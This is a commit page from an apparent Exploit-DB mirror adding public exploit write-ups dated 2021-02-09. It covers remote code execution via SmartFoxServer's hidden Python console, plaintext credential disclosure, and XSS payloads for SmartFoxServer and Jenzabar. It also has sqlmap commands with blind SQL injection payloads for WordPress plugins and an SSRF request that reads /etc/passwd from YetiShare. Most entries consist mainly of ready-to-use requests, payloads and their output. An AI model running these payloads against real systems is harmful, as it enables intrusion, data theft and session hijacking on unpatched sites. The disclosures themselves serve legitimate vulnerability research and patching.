bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2021-02-09

Browse source 
19 changes to exploits/shellcodes

SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution
SmartFoxServer 2X 2.17.0 - Credentials Disclosure
Millewin 13.39.146.1 - Local Privilege Escalation
AMD Fuel Service - 'Fuel.service' Unquote Service Path
Microsoft Internet Explorer 11 32-bit - Use-After-Free
SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS
Jenzabar 9.2.2 - 'query' Reflected XSS.
WordPress Plugin Welcart e-Commerce 2.0.0 - 'search[order_column][0]' SQL injection
WordPress Plugin Supsystic Ultimate Maps 1.1.12 - 'sidx' SQL injection
WordPress Plugin Supsystic Pricing Table 1.8.7 - Multiple Vulnerabilities
YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery
Alt-N MDaemon webmail 20.0.0 - 'Contact name' Stored Cross Site Scripting (XSS)
Alt-N MDaemon webmail 20.0.0 - 'file name' Stored Cross Site Scripting (XSS)
WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection
WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection
WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities
WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities
WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities
WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion
This commit is contained in:
Offensive Security 2021-02-09 05:01:57 +00:00
parent eb867d9bd4
commit 84533192ae
20 changed files with 2517 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

402
exploits/multiple/local/49526.txt Normal file
View file

@ -0,0 +1,402 @@
# Exploit Title: SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution
# Date: 29.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.smartfoxserver.com
Vendor: gotoAndPlay()
Product web page: https://www.smartfoxserver.com
Affected version: Server: 2.17.0
Remote Admin: 3.2.6
SmartFoxServer 2X, Pro, Basic
Summary: SmartFoxServer (SFS) is a comprehensive SDK for
rapidly developing multiplayer games and applications
with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal
Windows Platform, Android, Java, C++ and more. SmartFoxServer
comes with a rich set of features, an impressive
documentation set, tens of examples with their source,
powerful administration tools and a very active support
forum. Born in 2004, and evolving continuously since
then, today SmartFoxServer is the leading middleware to
create large scale multiplayer games, MMOs and virtual
communities. Thanks to its simplicity of use, versatility
and performance, it currently powers hundreds of projects
all over the world, from small chats and turn-based games
to massive virtual worlds and realtime games.
Desc: An authenticated attacker can execute remote arbitrary
Python code after enabling and unlocking the undocumented
console module.
Tested on: Windows (all) 64bit installer
Linux/Unix 64bit installer
MacOS (10.8+) 64bit installer
Java 1.8.0_281
Python 3.9.1
Python 2.7.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5628
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5628.php
29.01.2021
--
------------------------------------------------------
Undocumented functionality in software
#INABIAF (https://en.wikipedia.org/wiki/Undocumented_feature)
See also:
- Backdoor (computing)
- Easter egg (media)
God Mode Console (Console Module) unlock instructions:
------------------------------------------------------
$ pwd
/config/admin
$ vi /admintool.xml # Uncomment <module id="Console" name="Console" description="Interact with the SmartFoxServer instance via command line"/>
$ cd .. ;pwd
/config
$ touch ConsoleModuleUnlock.txt
Mac/Windows PoC:
----------------
GET http://localhost:8080/admin/modules/console.html HTTP/1.1
--------------------------------------
ADMIN_CONSOLE, version 3.0.0
--------------------------------------
Type help() for assistance.
> help()
zm SFSZoneManager
sfs SmartFoxServer
um SFSUserManager
api SFSApi
bum SFSBannedUserManager
xm SFSExtensionManager
eng BitSwarmEngine
sm DefaultSessionManager
extras() For more custom function calls
shortcuts() For keyboard shortcuts details
> eng
com.smartfoxserver.bitswarm.core.BitSwarmEngine@3823acc4
> extras()
version(): Shows the Console extension version
reloadScripts(): Reload the dynamic server scripts
execute(): Launches the last loaded script again
files(path): Shows the files at the specified path
controller(id): Obtain one of the controllers from its id. 0=System, 1=Extension, 2=Smasher
zones(): List of active zones
> version()
2.0.1
> files(".") # Win64
['config', 'data', 'extensions', 'lib', 'logs', 'sfs2x-service.exe', 'sfs2x-service.vmoptions', 'sfs2x-standalone.exe', 'sfs2x-standalone.vmoptions', 'sfs2x.bat', 'www', 'zones']
> files(".") # MacOS
['zones', 'config', 'www', 'extensions', 'logs', 'lib', 'sfs2x-service.vmoptions', 'sfs2x-standalone.vmoptions', 'sfs2x.-standalone', 'data', 'sfs2x-service']
> import os
> os.name
java
> os.system("C:\\windows\\system32\\calc.exe") # Win64
1
> import popen2
> os.popen2("""osascript -e 'tell app "Calculator" to open'""") # MacOS
1
>
gmc.py:
-------
#
# _____ _____ ____ _____ _____ ____ _____
# | __| | \ | | | \| __|
# | | | | | | | | | | | | | | | __|
# |_____|_____|____/ |_|_|_|_____|____/|_____|
# _____ _____ _____ _____ _____ __ _____
# | | | | | __| | | | __|
# | --| | | | | |__ | | | |__| __|
# |_____|_____|_|___|_____|_____|_____|_____|
#
# SmartFoxServer2X Admin Console Scripts
#
# (c) 2012-2016 gotoAndPlay()
# @author Marco Lapi
#
# Version 2.x
#
# Python Imports
import types
import sys
#
# This global variable allows to lock the Console so that it can't be misused
#
__CONSOLE_LOCK = False
# Java Imports
import java
from com.smartfoxserver.v2.entities.data import *
__scripts = [
{'name':'version()', 'doc':'Shows the Console extension version'},
{'name':'reloadScripts()', 'doc':'Reload the dynamic server scripts'},
{'name':'execute()', 'doc':'Launches the last loaded script again'},
{'name':'files(path)', 'doc':'Shows the files at the specified path'},
{'name':'controller(id)', 'doc':'Obtain one of the controllers from its id. 0=System, 1=Extension, 2=Smasher'},
{'name':'zones()', 'doc':'List of active zones'}
...
...
javashell.py:
-------------
# override defaults based on osType
if osType == "nt":
shellCmd = ["cmd", "/c"]
envCmd = "set"
envTransform = string.upper
elif osType == "dos":
shellCmd = ["command.com", "/c"]
envCmd = "set"
envTransform = string.upper
elif osType == "posix":
shellCmd = ["sh", "-c"]
envCmd = "env"
elif osType == "mac":
curdir = ':' # override Posix directories
pardir = '::'
elif osType == "None":
pass
# else:
# # may want a warning, but only at high verbosity:
# __warn( "Unknown os type '%s', using default behavior." % osType )
return _ShellEnv( shellCmd, envCmd, envTransform )
com--|
|--smartfoxserver--|
|--v2--|
|--admin--|
|--handlers--|
|--requests--|
|--ConsoleModuleReqHandler.java:
---------------------------------------------------------------------------------------------------
package com.smartfoxserver.v2.admin.handlers.requests;
import org.python.core.PyJavaInstance;
import org.python.core.PyException;
import com.smartfoxserver.v2.SmartFoxServer;
import java.io.IOException;
import org.apache.commons.io.FileUtils;
import java.io.File;
import com.smartfoxserver.bitswarm.core.BitSwarmEngine;
import org.python.core.PyString;
import org.python.core.Py;
import org.python.core.PySystemState;
import com.smartfoxserver.v2.entities.data.SFSObject;
import com.smartfoxserver.v2.extensions.ExtensionLogLevel;
import com.smartfoxserver.v2.entities.data.ISFSObject;
import com.smartfoxserver.v2.entities.User;
import org.python.core.PyObject;
import org.python.util.PythonInterpreter;
import com.smartfoxserver.v2.annotations.Instantiation;
import com.smartfoxserver.v2.annotations.MultiHandler;
@MultiHandler
@Instantiation(Instantiation.InstantiationMode.SINGLE_INSTANCE)
public class ConsoleModuleReqHandler extends BaseAdminModuleReqHandler
{
public static final String MODULE_ID = "Console";
public static final String VER = "2.0.1";
private static final String MODULE_UNLOCK_FILE = "ConsoleModuleUnlock.txt";
private static final String COMMANDS_PREFIX = "console";
private static final String FN_HINTS = "__hints__";
private static final String CONSOLE_LOCK = "__CONSOLE_LOCK";
private static final String CMD_RELOAD_SCRIPTS = "reloadScripts()";
private static final String SCRIPT_PATH = "config/admin/gmc/";
private static final String MAIN_SCRIPT = "gmc.py";
private static final String GRID_SCRIPT = "gmc-grid.py";
private final String REQ_CMD = "cmd";
private final String REQ_HINT = "hint";
private final String REQ_SCRIPT = "script";
private final String RES_ERROR_LOCKED = "locked";
protected PythonInterpreter runTime;
private PyObject fnGetHints;
private volatile boolean inited;
public ConsoleModuleReqHandler() {
super("console", "Console");
this.inited = false;
}
public void handleAdminRequest(final User sender, final ISFSObject params) {
if (!this.inited) {
this.init();
}
if (!this.isModuleUnlocked()) {
this.trace(ExtensionLogLevel.WARN, "Console module is locked. Request denied");
this.sendResponse("locked", (ISFSObject)new SFSObject(), sender);
return;
}
final String cmd = params.getUtfString("__[[REQUEST_ID]]__");
if (cmd.equals("cmd")) {
this.handleCommand(params, sender);
}
else if (cmd.equals("hint")) {
this.handleCodeHint(params, sender);
}
else if (cmd.equals("script")) {
this.handleScript(params, sender);
}
}
public synchronized void init() {
final String script = this.loadMainScript();
if (script == null) {
throw new RuntimeException("Cannot load AdminConsole's helper script! Plase reinstall this Extension making sure to follow the documentation step by step.");
}
this.runTime = new PythonInterpreter((PyObject)null, new PySystemState());
final PySystemState sys = Py.getSystemState();
sys.path.append((PyObject)new PyString("./extensions/"));
sys.path.append((PyObject)new PyString("./extensions/__lib__/AdminConsole/"));
this.runTime.set("sfs", (Object)this.sfs);
this.runTime.set("eng", (Object)BitSwarmEngine.getInstance());
this.runTime.set("api", (Object)this.sfs.getAPIManager().getSFSApi());
this.runTime.set("um", (Object)this.sfs.getUserManager());
this.runTime.set("zm", (Object)this.sfs.getZoneManager());
this.runTime.set("xm", (Object)this.sfs.getExtensionManager());
this.runTime.set("bum", (Object)this.sfs.getBannedUserManager());
this.runTime.set("sm", (Object)this.sfs.getSessionManager());
this.runTime.set("__parent__", (Object)this);
this.runTime.exec("_2XGlobals_ = {'sfs':sfs,'eng':eng,'api':api,'um':um,'zm':zm,'xm':xm,'bum':bum,'sm':sm}");
this.runTime.exec(script);
this.fnGetHints = this.runTime.get("__hints__");
this.inited = true;
}
private String loadMainScript() {
String script = null;
try {
script = FileUtils.readFileToString(new File("config/admin/gmc/gmc.py"));
}
catch (IOException ex) {}
if (SmartFoxServer.grid()) {
String gridScript = null;
try {
gridScript = FileUtils.readFileToString(new File("config/admin/gmc/gmc-grid.py"));
script = String.valueOf(script) + gridScript;
}
catch (IOException ex2) {}
}
return script;
}
private void handleCommand(final ISFSObject params, final User sender) {
PyException err = null;
final String cmd = params.getUtfString("c");
PyObject result = null;
ISFSObject response = null;
if (!cmd.equals("reloadScripts()")) {
this.checkConsoleLock();
}
try {
result = this.runTime.eval(cmd);
}
catch (PyException err3) {
try {
this.runTime.exec(cmd);
}
catch (PyException err2) {
err = err2;
}
}
if (result != null) {
String repr = null;
if (result instanceof PyJavaInstance) {
final Object o = ((PyJavaInstance)result).__tojava__((Class)Object.class);
repr = o.toString();
}
else {
repr = result.toString();
}
repr = this.checkHTML(repr);
response = (ISFSObject)new SFSObject();
response.putUtfString("r", repr);
}
else if (err != null) {
response = (ISFSObject)new SFSObject();
response.putUtfString("e", err.toString());
}
this.sendResponse("cmd", response, sender);
}
private void handleCodeHint(final ISFSObject params, final User sender) {
this.checkConsoleLock();
final String cmd = params.getUtfString("c");
try {
final PyObject pyObj = this.runTime.eval(cmd);
final PyObject res = this.fnGetHints.__call__(pyObj, (PyObject)new PyJavaInstance((Object)sender));
final SFSObject sfso = (SFSObject)res.__tojava__((Class)SFSObject.class);
this.sendResponse("hint", (ISFSObject)sfso, sender);
}
catch (PyException ex) {}
}
private void handleScript(final ISFSObject params, final User sender) {
this.checkConsoleLock();
final byte[] data = params.getByteArray("script");
final String scriptData = new String(data);
final ISFSObject response = (ISFSObject)new SFSObject();
try {
this.runTime.exec(scriptData);
final PyObject fnExecute = this.runTime.get("execute");
final PyObject res = fnExecute.__call__();
response.putUtfString("r", res.toString());
}
catch (PyException err) {
response.putUtfString("e", err.toString());
}
this.sendResponse("script", response, sender);
}
private String checkHTML(String data) {
if (data.indexOf(60) > -1 && data.indexOf("<span") == -1) {
data = data.replaceAll("\\<", "<");
return data.replaceAll("\\>", ">");
}
return data;
}
private void checkConsoleLock() {
final Boolean locked = (Boolean)this.runTime.get("__CONSOLE_LOCK", (Class)Boolean.class);
if (locked) {
throw new IllegalStateException("Admin Console is locked.");
}
}
private boolean isModuleUnlocked() {
final File lock = new File("config/ConsoleModuleUnlock.txt");
return lock.exists();
}
}

73
exploits/multiple/local/49527.txt Normal file
View file

@ -0,0 +1,73 @@
# Exploit Title: SmartFoxServer 2X 2.17.0 - Credentials Disclosure
# Date: 29.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.smartfoxserver.com
SmartFoxServer 2X 2.17.0 Credentials Disclosure
Vendor: gotoAndPlay()
Product web page: https://www.smartfoxserver.com
Affected version: Server: 2.17.0
Remote Admin: 3.2.6
SmartFoxServer 2X, Pro, Basic
Summary: SmartFoxServer (SFS) is a comprehensive SDK for
rapidly developing multiplayer games and applications
with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal
Windows Platform, Android, Java, C++ and more. SmartFoxServer
comes with a rich set of features, an impressive
documentation set, tens of examples with their source,
powerful administration tools and a very active support
forum. Born in 2004, and evolving continuously since
then, today SmartFoxServer is the leading middleware to
create large scale multiplayer games, MMOs and virtual
communities. Thanks to its simplicity of use, versatility
and performance, it currently powers hundreds of projects
all over the world, from small chats and turn-based games
to massive virtual worlds and realtime games.
Desc: The application stores sensitive information in an
unencrypted XML file called /config/server.xml. A local
attacker that has access to the current user session can
successfully disclose plain-text credentials that can be
used to bypass authentication to the affected server.
Tested on: Windows (all) 64bit installer
Linux/Unix 64bit installer
MacOS (10.8+) 64bit installer
Java 1.8.0_281
Python 3.9.1
Python 2.7.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5627
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5627.php
CWE ID: CWE-312
CWE URL: https://cwe.mitre.org/data/definitions/312.html
29.01.2021
--
PS C:\Users\t00t\SmartFoxServer_2X\SFS2X\config> Get-Content server.xml | Select-String -Pattern passw -Context 1,0
<login>sfsadmin</login>
> <password>Waddup</password>
<login>testingus</login>
> <password>123456</password>
<mailUser>username</mailUser>
> <mailPass>password</mailPass>
C:\Users\t00t\SmartFoxServer_2X\SFS2X\config>icacls server.xml
server.xml NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
LAB42\t00t:(I)(F)

78
exploits/multiple/webapps/49528.txt Normal file
View file

@ -0,0 +1,78 @@
# Exploit Title: SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS
# Date: 29.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.smartfoxserver.com
Vendor: gotoAndPlay()
Product web page: https://www.smartfoxserver.com
Affected version: Server: 2.17.0
Remote Admin: 3.2.6
SmartFoxServer 2X, Pro, Basic
Summary: SmartFoxServer (SFS) is a comprehensive SDK for
rapidly developing multiplayer games and applications
with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal
Windows Platform, Android, Java, C++ and more. SmartFoxServer
comes with a rich set of features, an impressive
documentation set, tens of examples with their source,
powerful administration tools and a very active support
forum. Born in 2004, and evolving continuously since
then, today SmartFoxServer is the leading middleware to
create large scale multiplayer games, MMOs and virtual
communities. Thanks to its simplicity of use, versatility
and performance, it currently powers hundreds of projects
all over the world, from small chats and turn-based games
to massive virtual worlds and realtime games.
Desc: Authenticated Cross-Site Scripting was discovered.
Input passed to the AdminTool console is not properly
sanitized before being returned to the user. This can be
exploited to execute arbitrary HTML code in a user's browser
session in context of an affected site.
-----------------------------------------------------------------
/ConsoleModuleReqHandler.java:
------------------------------
private String checkHTML(String data) {
if (data.indexOf(60) > -1 && data.indexOf("<span") == -1) {
data = data.replaceAll("\\<", "<");
return data.replaceAll("\\>", ">");
}
return data;
-----------------------------------------------------------------
Tested on: Windows (all) 64bit installer
Linux/Unix 64bit installer
MacOS (10.8+) 64bit installer
Java 1.8.0_281
Python 3.9.1
Python 2.7.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5626
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5626.php
29.01.2021
--
Typing payload:
<script>confirm(document.URL)
WebSocket payload:
\x80\x00\x52\x12\x00\x03\x00\x01\x63\x02\x01\x00
\x01\x61\x03\x00\x0D\x00\x01\x70\x12\x00\x03\x00
\x01\x63\x08\x00\x0C\x63\x6F\x6E\x73\x6F\x6C\x65
\x2E\x68\x69\x6E\x74\x00\x01\x72\x04\xFF\xFF\xFF
\xFF\x00\x01\x70\x12\x00\x01\x00\x01\x63\x08\x00
\x18\x3C\x73\x63\x72\x69\x70\x74\x3E\x63\x6F\x6E
\x66\x69\x72\x6D\x28\x64\x6F\x63\x75\x6D\x65\x6E
\x74\x2E\x55\x52\x4C\x29

23
exploits/multiple/webapps/49529.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Jenzabar 9.2.2 - 'query' Reflected XSS.
# Date: 20210206
# Exploit Author: y0ung_dst
# Vendor Homepage: https://jenzabar.com
# Version: Jenzabar — v9.2.0-v9.2.1-v9.2.2 (and maybe other versions)
# Tested on: Windows 10
# CVE : CVE-202126723
-Description:
A Reflected Cross-site scripting (XSS) vulnerability in Jenzabar v9.2.0 through 9.2.2. Attacker could inject web script or HTML via the query parameter (aka the Search Field). To exploit the vulnerability, someone must click the link.
-Payload used:
"><script>alert(1)</script>
-Example :
https://localhost/ics?tool=search&query="><script>alert(1)</script>
-Steps to reproduce:
1. Open a website that use Jenzabar v9.2.0 through 9.2.2.
2. In the Search Field, enter anything.
3. Edit the query by replacing the text with the payload.
4. Press Enter to trigger the alert.

29
exploits/php/webapps/49531.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: WordPress Plugin Welcart e-Commerce 2.0.0 - 'search[order_column][0]' SQL injection
# Date: 04/08 2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://www.welcart.com/
# Software Link: https://downloads.wordpress.org/plugin/usc-e-shop.2.0.0.zip
# Category: Web Application
# Version: 2.0.0
# Tested on: Ubuntu 18.04.04 LTS / WordPress 5.4.2
# 05/08 2020: Vendor notified
# 06/08 2020: Vendor requested detailed information
# 06/08 2020: Information provided
# 11/08 2020: Vendor notified that a patch will be provided. No current ETA
# 10/12 2020: Vulnerability fixed
# 1. Description
The POST parameter "search[order_column][0]" does not sanitize user input when searching through the order lists.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching through existing order lists and save it to request.txt
Referer: http://192.168.0.63/wp-admin/admin.php?page=usces_orderlist
sqlmap -r request.txt --dbms=mysql -p search[order_column][0]
Parameter: search[order_column][0] (POST)
Type: time-based blind
Payload: search[order_column][0]=ID) AND (SELECT 9900 FROM (SELECT(SLEEP(5)))tKPd) AND (8867=8867&search[order_word][0]=test&search[order_word_term][0]=contain&search[order_term]=AND&search[order_column][1]=&search[order_word][1]=&search[order_word_term][1]=contain&search[product_column][0]=&search[product_word][0]=&search[product_word_term][0]=contain&search[product_term]=AND&search[product_column][1]=&search[product_word][1]=&search[product_word_term][1]=contain&searchIn=Search&allchange[column]=&collective=&wc_nonce=5e3ed8895f&_wp_http_referer=/wp-admin/admin.php?page=usces_orderlist

35
exploits/php/webapps/49532.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: WordPress Plugin Supsystic Ultimate Maps 1.1.12 - 'sidx' SQL injection
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-maps-by-supsystic.1.1.12.zip
# Category: Web Application
# Version: 1.1.12
# Tested on: 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 09/12 2020: Vulnerability fixed
# 1. Description
The GET parameter "sidx" does not sanitize user input when searching for existing maps.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for existing maps and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=ultimate-maps-supsystic
sqlmap -r request.txt --dbms=mysql -p sidx
Parameter: sidx (GET)
Type: boolean-based blind
Payload: mod=maps&action=getListForTbl&pl=ums&reqType=ajax&search[text_like]=t&_search=false&nd=1595781611306&rows=10&page=1&sidx=(SELECT (CASE WHEN (7084=7084) THEN 0x6964 ELSE (SELECT 3932 UNION SELECT 2499) END))&sord=desc
Type: time-based blind
Payload: mod=maps&action=getListForTbl&pl=ums&reqType=ajax&search[text_like]=t&_search=false&nd=1595781611306&rows=10&page=1&sidx=id AND (SELECT 9735 FROM (SELECT(SLEEP(5)))AJAb)&sord=desc

61
exploits/php/webapps/49533.txt Normal file
View file

@ -0,0 +1,61 @@
# Exploit Title: WordPress Plugin Supsystic Pricing Table 1.8.7 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/pricing-table-by-supsystic.1.8.7.zip
# Version: 1.8.7 and 1.8.6
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 07/12 2020: Vulnerability patched
##################################
SQLi
##################################
# 1. Description
The GET parameter "sidx" does not sanitize user input when searching for existing pricing tables.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for existing pricing tables and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=supsystic-tables&module=tables
sqlmap -r request.txt --dbms=mysql -p sidx
Parameter: sidx (GET)
Type: boolean-based blind
Payload: mod=tables&action=getListForTbl&pl=pts&reqType=ajax&pts_nonce=2893fe633b&search[text_like]=test&_search=false&nd=1595624411398&rows=10&page=0&sidx=(SELECT (CASE WHEN (5313=5313) THEN 0x6964 ELSE (SELECT 9338 UNION SELECT 5490) END))&sord=desc
Type: time-based blind
Payload: mod=tables&action=getListForTbl&pl=pts&reqType=ajax&pts_nonce=2893fe633b&search[text_like]=test&_search=false&nd=1595624411398&rows=10&page=0&sidx=id AND (SELECT 9475 FROM (SELECT(SLEEP(5)))OjhB)&sord=desc
##################################
Stored XSS
##################################
# 1. Description
The "Edit name" and "Edit HTML" features are vulnerable to stored XXS.
Location: http://192.168.0.49/wp-admin/admin.php?page=tables-supsystic&tab=tables_edit&id=[TABLE ID]
# 2. Proof of Concept (PoC)
Enter the following payload into the "Edit" field in the top left corner: "><script>alert(1)</script><!--'
The payload will execute when viewing the pricing table itself, and also in the "Show All Tables" section.
Enter the following payload into the "Edit HTML" section in the top right corner: <script>alert(1)</script><!--
The payload will get stored and will execute everytime the user attempts to view the pricing table.

139
exploits/php/webapps/49534.txt Normal file
View file

@ -0,0 +1,139 @@
# Title: YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery
# Date: 09.01.2021
# Author: Numan Türle
# Vendor Homepage: https://mfscripts.com
# Software Link: https://yetishare.com
# Version: v5.1.0
# Tested on: YetiShare - File Hosting Script v5.1.0, Php Version : 7.4
Summary
---------
YetiShare is script the file hosting. This script has remote file upload feature.
Since sufficient security measures are not taken in the remote file upload area,
SSRF vulnerability available.
Description
---------
When a new upload request is received by the user, the following function block
is called first.
app/tasks/process_remote_file_downloads.cron.php
------------------------------------------------
// include plugin code
$url = $urlDownloadData['url'];
$params = PluginHelper::includeAppends('url_upload_handler', array(
'url' => $url,
'rowId' => 0,
'urlDownloadData' => $urlDownloadData,
)
);
$url = $params['url'];
// start download
$upload_handler->handleRemoteUrlUpload($url);
------------------------------------------------
The url parameter received as input from the user in the called function blog is
sent to the "handleRemoteUrlUpload" function.
/Users/numan/Desktop/file-hosting-script-v5.0.0-beta/app/services/
Uploader.class.php
------------------------------------------------------------------
public function handleRemoteUrlUpload($url, $rowId = 0) {
.....
$remoteFileDetails = $this->getRemoteFileDetails($url);
$remoteFilesize = (int) $remoteFileDetails['bytes'];
if ($remoteFilesize > $this->options['max_file_size']) {
.....ERROR MSG
}
else {
// look for real filename if passed in headers
if (strlen($remoteFileDetails['real_filename'])) {
$realFilename = trim(current(explode(';',
$remoteFileDetails['real_filename'])));
if (strlen($realFilename)) {
$this->fileUpload->name = $realFilename;
}
}
// try to get the file locally
$localFile = $this->downloadRemoteFile($url, true);
------------------------------------------------------------------
In this function that is called, the details of the file are taken first and if
the bytes is not larger than the max_file_size, the "downloadRemoteFile"
function will go to the download.
------------------------------------------------------------------
public function getRemoteFileDetails($url) {
.....
$execute = curl_exec($ch);
// check if any error occured
if (!curl_errno($ch)) {
$rs['bytes'] = (int) curl_getinfo($ch,
CURLINFO_CONTENT_LENGTH_DOWNLOAD);
.....
------------------------------------------------------------------
------------------------------------------------------------------
public function downloadRemoteFile($url, $streamResponse = false) {
.....
// use curl
if (function_exists('curl_init')) {
// get file via curl
$fp = fopen($tmpFullPath, 'w+');
if ($ch === null) {
$ch = curl_init();
}
curl_setopt($ch, CURLOPT_URL, $url);
.....
curl_setopt($ch, CURLOPT_FILE, $fp);
if (curl_exec($ch) === false) {
// log error
LogHelper::error('Failed getting url. Error: '
. curl_error($ch) . ' (' . $url . ')');
return false;
}
$status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
fclose($fp);
.....
}
.....
------------------------------------------------------------------
POC
---------
GET /ajax/url_upload_handler?csaKey1=CSAKEY1&csaKey2=CSAKEY2&rowId=0&url=file:///etc/passwd&folderId=-1 HTTP/1.1
Host: target.com
Connection: close
Accept: */*
Cookie: HERE_COOKIE
Response
---------
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: close
Pragma: no-cache
Content-Length: XXX
...<script>parent.updateUrlProgress({"done":{"name":"passwd","size":2082,
"type":"text\/plain; charset=us-ascii","error":null,"rowId":0,
"requestUrl":"file:\/\/\/etc\/passwd","url":....
..........
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

35
exploits/php/webapps/49539.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection
# Date: 24/07 2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/newsletter-by-supsystic.1.5.5.zip
# Category: Web Application
# Version: 1.5.5
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 01/12 2020: Plugin/Project closed by WordPress Security team
# 1. Description
The GET parameter "sidx" does not sanitize user input when searching for existing subscribers.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for existing subscribers and save it to request.txt.
Referer: http://192.168.0.49/wp-admin/admin.php?page=newsletters-supsystic&tab=subscribers
sqlmap -r request.txt --dbms=mysql -p sidx
Parameter: sidx (GET)
Type: time-based blind
Payload: mod=subscribers&action=getListForTbl&pl=nbs&reqType=ajax&search[text_like]=testing&search[search_list]=0&_search=false&nd=1595780014444&rows=25&page=0&sidx=id AND (SELECT 1511 FROM (SELECT(SLEEP(5)))gTHi)&sord=desc

38
exploits/php/webapps/49540.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection
# Date: 09/08/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/membership-by-supsystic.1.4.7.zip
# Version: 1.4.7
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
# 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 22/12 2020: Vulnerability fixed
# 1. Description
The GET parameters "search" and "sidx" does not sanitize user input when searching for badges.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
Referer: http://192.168.0.63/wp-admin/admin.php?page=supsystic-membership&module=badges&action=index
sqlmap -r request.txt --dbms=mysql -p search
Parameter: search (GET)
Type: time-based blind
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s' AND (SELECT 8958 FROM (SELECT(SLEEP(5)))oBIL) AND 'trjK'='trjK&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
Type: UNION query
